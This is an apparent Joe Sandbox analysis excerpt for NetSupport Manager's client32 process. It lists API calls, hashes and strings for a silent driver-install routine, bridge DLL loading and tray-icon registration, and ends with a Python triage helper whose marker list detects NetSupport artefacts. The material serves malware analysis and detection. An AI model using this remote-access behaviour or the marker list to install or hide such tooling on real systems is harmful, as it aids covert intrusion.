                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                        • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                        • API String ID: 1861668072-1296821031
                                                        • Opcode ID: 72918964a1369d3bb2368425b4338c3315936ac85280862e7e4cd8f3fdf3f6c4
                                                        • Instruction ID: 3a2d50e1deb99135114f4ad4be661bc5fe19da930bc3f706a95416d91adfb30e
                                                        • Opcode Fuzzy Hash: 72918964a1369d3bb2368425b4338c3315936ac85280862e7e4cd8f3fdf3f6c4
                                                        • Instruction Fuzzy Hash: 0D21A136F1015A9FD701DFE598819FEF7FDEF8D319B1040AAE815D7204EA3199008B90
                                                        APIs
                                                        • IsIconic.USER32(000000FF), ref: 110B761D
                                                        • ShowWindow.USER32(000000FF,00000009,?,110594F3,00000001,00000001,?,00000000), ref: 110B762D
                                                        • BringWindowToTop.USER32(000000FF), ref: 110B7637
                                                        • GetCurrentThreadId.KERNEL32 ref: 110B7658
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$BringCurrentIconicShowThread
                                                        • String ID:
                                                        • API String ID: 4184413098-0
                                                        • Opcode ID: d925559f559c2a1babfa56e082f61c15d26bdf959c9a64c67aafbf439c555b20
                                                        • Instruction ID: ad5466151a3d102bc84d22bce7331062c3264b6d9f279f2b8dca4e33c95fbde4
                                                        • Opcode Fuzzy Hash: d925559f559c2a1babfa56e082f61c15d26bdf959c9a64c67aafbf439c555b20
                                                        • Instruction Fuzzy Hash: 9731917AE016159FDB14DF28D8C0BDA7BA4AF48354F09846AEC059F386D774E844CBE4
                                                        APIs
                                                        • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 11031356
                                                        • SetClipboardData.USER32(00000000,00000000), ref: 11031372
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$DataFormatName
                                                        • String ID:
                                                        • API String ID: 3172747766-0
                                                        • Opcode ID: c368b33a726b0f3c658c7c5764f9fe45bd421e2bcf66c613ff5b6d93b4405f57
                                                        • Instruction ID: 5a9ba92f3b64397a12cca0f87665bff893f2c78cd86a97b99a1c74ad90e41dcc
                                                        • Opcode Fuzzy Hash: c368b33a726b0f3c658c7c5764f9fe45bd421e2bcf66c613ff5b6d93b4405f57
                                                        • Instruction Fuzzy Hash: B701B574D26514EED700DF60884097EB3BCAF8964BF108196EC4095484EF35960086A6
                                                        APIs
                                                        • BeginPaint.USER32(00000000,?,?,?,00000000), ref: 1112D2EF
                                                        • GetClientRect.USER32(?,?), ref: 1112D31F
                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1112D33A
                                                        • SelectObject.GDI32(00000000,00000000), ref: 1112D34E
                                                        • SelectObject.GDI32(00000000,?), ref: 1112D35B
                                                        • GetTextColor.GDI32(00000000), ref: 1112D376
                                                        • GetBkMode.GDI32(00000000), ref: 1112D383
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 1112D392
                                                        • SetRect.USER32(?,00000005,00000005,?,?), ref: 1112D3E3
                                                        • SetTextColor.GDI32(00000000,00FFFFFF), ref: 1112D3EF
                                                        • DrawTextA.USER32(00000000,?,?,?,00000020), ref: 1112D45A
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Text$ColorModeObjectRectSelect$BeginBitmapClientCompatibleCreateDrawErrorExitLastMessagePaintProcesswsprintf
                                                        • String ID: %d %s$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 3020923283-29264745
                                                        • Opcode ID: d59ffdd2591979c44c829f97319ea5c8735ab796786ff22a7aabfc1422cc5b0b
                                                        • Instruction ID: e4a614af463f3ba32ae6b948dbfb1b6a5cc0be9bddc6f11eb1a9c30d18065d07
                                                        • Opcode Fuzzy Hash: d59ffdd2591979c44c829f97319ea5c8735ab796786ff22a7aabfc1422cc5b0b
                                                        • Instruction Fuzzy Hash: F1E17CB5A00256AFDB15CF64CD84FEEF7B5BF48304F508199E519A7644EB30AA84CFA0
                                                        APIs
                                                        • BeginPaint.USER32(?,?), ref: 110151BF
                                                        • GetWindowRect.USER32(00000000,?), ref: 110151EC
                                                        • _memset.LIBCMT ref: 110151FA
                                                        • CreateFontIndirectA.GDI32(?), ref: 11015216
                                                        • SelectObject.GDI32(00000000,00000000), ref: 1101522A
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 11015235
                                                        • BeginPath.GDI32(00000000), ref: 11015242
                                                        • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015260
                                                        • EndPath.GDI32(00000000), ref: 11015267
                                                        • PathToRegion.GDI32(00000000), ref: 1101526E
                                                        • CreateSolidBrush.GDI32(?), ref: 11015280
                                                        • CreateSolidBrush.GDI32(?), ref: 11015296
                                                        • CreatePen.GDI32(00000000,00000002,?), ref: 110152B0
                                                        • SelectObject.GDI32(00000000,00000000), ref: 110152BE
                                                        • SelectObject.GDI32(00000000,?), ref: 110152CE
                                                        • GetRgnBox.GDI32(00000000,?), ref: 110152DB
                                                        • OffsetRgn.GDI32(00000000,?,00000000), ref: 110152FA
                                                        • FillRgn.GDI32(00000000,00000000,?), ref: 11015309
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101531C
                                                        • DeleteObject.GDI32(00000000), ref: 11015329
                                                        • SelectObject.GDI32(00000000,?), ref: 11015333
                                                        • SelectObject.GDI32(00000000,?), ref: 1101533D
                                                        • DeleteObject.GDI32(?), ref: 11015346
                                                        • DeleteObject.GDI32(?), ref: 1101534F
                                                        • DeleteObject.GDI32(?), ref: 11015358
                                                        • SelectObject.GDI32(00000000,?), ref: 11015362
                                                        • DeleteObject.GDI32(?), ref: 1101536B
                                                        • SetBkMode.GDI32(00000000,?), ref: 11015375
                                                        • EndPaint.USER32(?,?), ref: 11015389
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110151D2
                                                        • m_hWnd, xrefs: 110151D7
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$ErrorExitFillFontFrameIndirectLastMessageOffsetProcessRectRegionTextWindow_memsetwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 494162906-1557312927
                                                        • Opcode ID: 06ae283321112b545d0f64b3b06f8fd0a25e3972faa2f6290334117dc8ba537b
                                                        • Instruction ID: 0dae53ec8a8f700d59e9fcd6d9c10e05b93e955bbe6dfdf0a8bc5eab80720995
                                                        • Opcode Fuzzy Hash: 06ae283321112b545d0f64b3b06f8fd0a25e3972faa2f6290334117dc8ba537b
                                                        • Instruction Fuzzy Hash: 77511BB6A00228AFDB11DBA4CC88FAEF7B9BF89304F108599F515D7244DB749A44CF61
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Kernel32.dll,82E0FB89,75A33760,?,75A37A80), ref: 11119277
                                                        • GetCurrentProcess.KERNEL32 ref: 111192FA
                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1111930E
                                                        • SetLastError.KERNEL32(00000078), ref: 11119328
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1111934E
                                                        • _memset.LIBCMT ref: 111193AC
                                                        • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 111193F1
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11119408
                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 11119422
                                                        • CloseHandle.KERNEL32(?), ref: 11119446
                                                        • CloseHandle.KERNEL32(?), ref: 1111944F
                                                        • FreeLibrary.KERNEL32(?), ref: 1111949C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CloseHandleLibrary$AddressCodeCreateCurrentErrorExitFileFreeLastLoadModuleNameObjectProcSingleWait_memset
                                                        • String ID: "$CSmartcardDeviceMngr - PscrInstallDeviceW failed (%d)$CSmartcardDeviceMngr - failed to load pscrinst.dll (%d)$D$IsWow64Process$Kernel32.dll$PscrInstallDeviceW$Root\NS-PseudoSmartCardReader$\winst64.exe" /q /q /si$nspscr.inf$pscrinst.dll
                                                        • API String ID: 3751713381-2378866903
                                                        • Opcode ID: 1c1322a16d27d7fc49c8e8f33464c3f22e0f6ef2ff991863d38a7f21db42ab11
                                                        • Instruction ID: d56570f91637704808b564973e54e4635ab13e3ba2239a0607908c76791a74b6
                                                        • Opcode Fuzzy Hash: 1c1322a16d27d7fc49c8e8f33464c3f22e0f6ef2ff991863d38a7f21db42ab11
                                                        • Instruction Fuzzy Hash: 35817DB5D412699FCB20DFA5DDC8A9DFBB9FB48304F1441EAE419A3244DB305A80CF51
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • LoadLibraryA.KERNEL32(-00000001,00000000,Bridge,Protocol,00000000,00000000,00000002,00000000), ref: 11029067
                                                        • GetLastError.KERNEL32 ref: 1102907B
                                                        • GetProcAddress.KERNEL32(00000000,br_open), ref: 110290B5
                                                        • GetProcAddress.KERNEL32(00000000,br_close), ref: 110290DA
                                                        • GetProcAddress.KERNEL32(00000000,br_status), ref: 110290FF
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • _memset.LIBCMT ref: 1102932D
                                                        • LoadIconA.USER32(00000000,0000045C), ref: 1102937A
                                                        • Shell_NotifyIconA.SHELL32(00000001,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029396
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$ErrorIconLastLoad$ExitLibraryMessageNotifyProcessShell___wcstoi64_memsetwsprintf
                                                        • String ID: *MSN$BaudRate$Bridge$CAPICAPICAPI$CLIENT32.CPP$ComPort$Debug$Inactivity$LoadOnStartup$Modem$Password$PasswordFile$Protocol$br_close$br_open$br_status$com%d %d /A%d /B%d /D%d /M%s /P%s /T%d /N%s$ipbr32.dll$tcbr32.dll
                                                        • API String ID: 2737259558-2044059647
                                                        • Opcode ID: 11b142ccfe591048df726263d131c869bb881a3fb8d325d09ae5b9e0eab2801d
                                                        • Instruction ID: 80f35169613b91d4f5af84d87da118ffc0d981a7cb71d091b144a322eb08291e
                                                        • Opcode Fuzzy Hash: 11b142ccfe591048df726263d131c869bb881a3fb8d325d09ae5b9e0eab2801d
                                                        • Instruction Fuzzy Hash: BD91D375E01666AFDB11DF65CCC4FDEF7A9AB4530CF5081A5F918A7280EA70A9408F90
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Kernel32.dll,?,00000001,82E0FB89,75A33760,?,75A37A80), ref: 111195B7
                                                        • GetCurrentProcess.KERNEL32 ref: 11119635
                                                        • GetProcAddress.KERNEL32(?,IsWow64Process), ref: 11119649
                                                        • SetLastError.KERNEL32(00000078), ref: 11119667
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1111968D
                                                        • _memset.LIBCMT ref: 111196EB
                                                        • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 11119730
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11119747
                                                        • CloseHandle.KERNEL32(?), ref: 1111975A
                                                        • CloseHandle.KERNEL32(?), ref: 11119763
                                                        • SetEvent.KERNEL32(?), ref: 111197C8
                                                        • FreeLibrary.KERNEL32(?), ref: 111197D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandleLibraryProcess$AddressCreateCurrentErrorEventFileFreeLastLoadModuleNameObjectProcSingleWait_memset
                                                        • String ID: "$CSmartcardDeviceMngr - PscrRemoveDeviceW failed (%d)$CSmartcardDeviceMngr - failed to load pscrinst.dll (%d)$D$IsWow64Process$Kernel32.dll$PscrRemoveDeviceW$Root\NS-PseudoSmartCardReader$\winst64.exe" /q /q /su$pscrinst.dll
                                                        • API String ID: 389065776-834071892
                                                        • Opcode ID: c44578842d204993e841975f1a3fa7606336999d1f0e71b0295d9c2100f7e49a
                                                        • Instruction ID: 4bb953576de971cc88626846f630ee5a2f793e05f54183a9a7552dd7088d59e1
                                                        • Opcode Fuzzy Hash: c44578842d204993e841975f1a3fa7606336999d1f0e71b0295d9c2100f7e49a
                                                        • Instruction Fuzzy Hash: D4716FB59016389FCB10DF64DC88A9EFBB9FF49714F1481EAE419A7244DB705A80CFA1
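The three records above (the pscrinst.dll install and remove routines that resolve IsWow64Process and spawn `winst64.exe`, and the bridge loader that registers a tray icon and shares a MessageBoxA/ExitProcess error handler at 11027FB0) are more useful in triage once the call lists are machine-readable. The following Python is an added example, not output of Joe Sandbox and not NetSupport's code: it parses API-call lines in the format this report prints them (`Name.MODULE(args), ref: addr`, with the optional `Part of subcall function` prefix, a format inferred from the lines above), recovers the `$`-joined `String ID` entries, and emits triage findings. The dwCreationFlags names are the documented Win32 constants and 0x78 is ERROR_CALL_NOT_IMPLEMENTED; the NetSupport marker list and the finding wording are my own choices. The sample input is copied from the records above (a subset of each).

```python
"""Triage helper for Joe Sandbox 'APIs' function records (added example)."""
import re
from collections import namedtuple

# One call line as the report prints it, e.g.
#   • CreateProcessA.KERNEL32(00000000,00000022,...), ref: 111193F1
#   • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$")

# CreateProcess dwCreationFlags bits (documented Win32 constants).
CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS", 0x10: "CREATE_NEW_CONSOLE",
                  0x04000000: "CREATE_DEFAULT_ERROR_MODE", 0x08000000: "CREATE_NO_WINDOW"}

# Substrings of NetSupport Manager strings listed in the records above; the
# marker list is my own choice, not something the report defines.
NETSUPPORT_MARKERS = ("nsmsrc", "CLIENT32.CPP", "pscrinst.dll", "winst64.exe",
                      "NS-PseudoSmartCardReader", "ipbr32.dll", "tcbr32.dll")

# ref: call-site address; subcall: callee address on 'Part of subcall' lines (else None)
ApiCall = namedtuple("ApiCall", "name module args ref subcall")


def parse_api_lines(text):
    """Parse the 'APIs' list of one record; lines that are not calls are skipped."""
    calls = []
    for m in filter(None, map(API_LINE.match, text.splitlines())):
        raw = m.group("args") or ""
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), m.group("sub")))
    return calls


def record_strings(text):
    """Recover the record's strings from its 'String ID:' line (the report joins them with '$')."""
    bodies = [l.partition("String ID:")[2] for l in text.splitlines() if "String ID:" in l]
    return [s.strip() for s in "$".join(bodies).split("$") if s.strip()]


def decode_creation_flags(value):
    """Name the known dwCreationFlags bits set in value, lowest bit first."""
    return [name for bit, name in sorted(CREATION_FLAGS.items()) if value & bit]


def triage(text):
    """Return ordered triage findings for one function record."""
    calls, strings, findings = parse_api_lines(text), record_strings(text), []
    names = [c.name for c in calls]
    resolved = [c.args[1] for c in calls if c.name == "GetProcAddress" and len(c.args) > 1]
    if resolved:
        findings.append("resolves at runtime: " + ", ".join(resolved))
    # SetLastError(0x78): 0x78 is ERROR_CALL_NOT_IMPLEMENTED, the usual fallback
    # when IsWow64Process is not exported by the running kernel32.
    if "IsWow64Process" in resolved and any(
            c.name == "SetLastError" and c.args[:1] == ("00000078",) for c in calls):
        findings.append("WOW64 probe with ERROR_CALL_NOT_IMPLEMENTED fallback")
    for c in calls:
        if c.name == "CreateProcessA" and len(c.args) > 5:
            try:
                flags = "/".join(decode_creation_flags(int(c.args[5], 16))) or "no flags"
            except ValueError:  # the report prints '?' for values it could not recover
                flags = "flags unknown"
            waited = "waits for exit" if "WaitForSingleObject" in names else "does not wait"
            findings.append(f"spawns child process ({flags}; {waited})")
    if "Shell_NotifyIconA" in names:
        findings.append("registers a notification-area icon")
    # A callee that shows MessageBoxA and then calls ExitProcess is a fatal-error path.
    by_sub = {}
    for c in calls:
        if c.subcall:
            by_sub.setdefault(c.subcall, set()).add(c.name)
    for sub, seen in sorted(by_sub.items()):
        if {"MessageBoxA", "ExitProcess"} <= seen:
            findings.append(f"fatal-error handler at {sub} (MessageBoxA + ExitProcess)")
    hits = sorted({m for m in NETSUPPORT_MARKERS for s in strings if m.lower() in s.lower()})
    if hits:
        findings.append("NetSupport Manager artefacts: " + ", ".join(hits))
    return findings


# Constructed input: lines copied from the two records above (a subset of each).
PSCR_INSTALL = r"""
• LoadLibraryA.KERNEL32(Kernel32.dll,82E0FB89,75A33760,?,75A37A80), ref: 11119277
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1111930E
• SetLastError.KERNEL32(00000078), ref: 11119328
• CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 111193F1
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 11119408
• String ID: "$CSmartcardDeviceMngr - failed to load pscrinst.dll (%d)$D$IsWow64Process$Root\NS-PseudoSmartCardReader$\winst64.exe" /q /q /si$nspscr.inf$pscrinst.dll
"""
BRIDGE_LOADER = r"""
• LoadLibraryA.KERNEL32(-00000001,00000000,Bridge,Protocol,00000000,00000000,00000002,00000000), ref: 11029067
• GetProcAddress.KERNEL32(00000000,br_open), ref: 110290B5
• GetProcAddress.KERNEL32(00000000,br_close), ref: 110290DA
  • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
  • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
• Shell_NotifyIconA.SHELL32(00000001,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029396
• String ID: *MSN$Bridge$CLIENT32.CPP$LoadOnStartup$Password$br_close$br_open$ipbr32.dll$tcbr32.dll
"""
```

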